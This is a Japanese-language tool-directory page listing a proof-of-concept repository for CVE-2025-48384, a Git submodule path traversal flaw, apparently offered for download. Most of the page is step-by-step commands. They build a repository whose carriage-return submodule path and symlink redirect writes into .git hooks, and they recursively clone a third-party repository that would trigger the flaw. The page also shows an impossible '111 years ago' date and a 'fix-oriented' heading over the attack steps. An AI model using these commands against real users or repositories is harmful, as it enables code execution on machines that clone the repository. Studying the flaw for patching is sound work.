Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-48384-test — Gitサブモジュールのパストラバーサル脆弱性を実証するCVE-2025-48384の再現。エクスプロイトを再現するためのステップバイステップのコマンドを備えています。 | Kitploit
ツール/GitHubGitHub/beishanxueyuan/cve-2025-48384-test
脆弱性分析コード分析エクスプロイトサプライチェーンセキュリティ
GitHubbeishanxueyuan/cve-2025-48384-test

CVE-2025-48384-test

Gitサブモジュールのパストラバーサル脆弱性を実証するCVE-2025-48384の再現。エクスプロイトを再現するためのステップバイステップのコマンドを備えています。

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

再現コマンド

root@kitploit:~
git clone --recursive https://github.com/beishanxueyuan/CVE-2025-48384-test.git

修正指向のGitHubリポジトリ

root@kitploit:~
git init repo
git -C repo -c protocol.file.allow=always submodule add https://github.com/beishanxueyuan/CVE-2025-48384.git sub
git -C repo mv sub $(printf "sub\r")

git config unset -f repo/.gitmodules submodule.sub.path
printf "\tpath = \"sub\r\"\n" >> repo/.gitmodules

git config unset -f repo/.git/modules/sub/config core.worktree
printf "[core]\n\tworktree = \"../../../sub\r\"\n" >> repo/.git/modules/sub/config

ln -s .git/modules/sub/hooks repo/sub
git -C repo add -A
git -C repo commit -m submodule

cd repo/

git branch -M main
git remote add origin https://github.com/beishanxueyuan/CVE-2025-48384-test.git
ツールをダウンロード